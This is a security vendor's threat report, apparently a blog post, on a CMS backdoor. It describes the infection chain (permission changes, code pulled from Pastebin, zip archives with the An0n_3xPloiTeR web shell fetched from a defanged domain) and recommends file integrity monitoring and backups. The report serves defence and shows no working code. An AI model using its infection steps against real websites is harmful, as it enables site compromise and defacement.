Backdoor Malware Overview

This report is about a backdoor with a shell capability that targets a variety of content management systems (CMS). Based on the security researcher’s findings, there is a strong indication that the malware was created by a bad actor who speaks the Turkish language. The backdoor is built to inject content into the infected website.

Tactics, Techniques, and Procedures

The malware is designed to target a variety of content management systems by looking for core files such as /includes/defines.php for Joomla. The malware starts the infection chain by modifying the permissions for specified system files and pulling down code from the popular website called Pastebin. The permissions changes to 644 on specified files giving the owner read and write access with groups only having read access. The code is pulled down using a customized cURL request via http_get() using a generated Pastebin link. The malware first checks if Joomla is installed and then looks for the following CMS’s: WordPress, OpenCart, and Prestashop.

The initial script written onto the webserver looks like this:


backdoor shell dropper

Image Source: Sucuri

When targeting Joomla systems, the malware downloads zip files called joomlahide.zip and joomla.zip from the domain shellx[.]org. One zip file contains a backdoor built for uploading files and the other archive contains the An0n_3xPloiTeR web shell. The An0n_3xPloiTeR is designed to deface websites, change the colors of the site, inject code, logout/self-removal options, and much more.

Business Unit Impact

  • May result in permission changes to core website files.
  • Could lead to the defacing of a critical business asset such as the company website.
  • May compromise the file integrity of the website.
  • May allow a bad actor with the ability to control the client-facing content of your website.

Recommendations

It is highly encouraged that you monitor your web presence for changes to key files using file integrity monitoring. Consider deploying an Ossec agent if you use AlienVault or turning on the AIE rules for FIM (File Integrity Monitoring) in LogRhythm. Maintain a decent number of backups of your website onsite and offsite as a precaution against a potential compromise. 

Sources

Supporting Documentation:

MITRE Mapping(s)

Chat With One of Our Experts




Threat Report backdoor malware CMS joomla Blog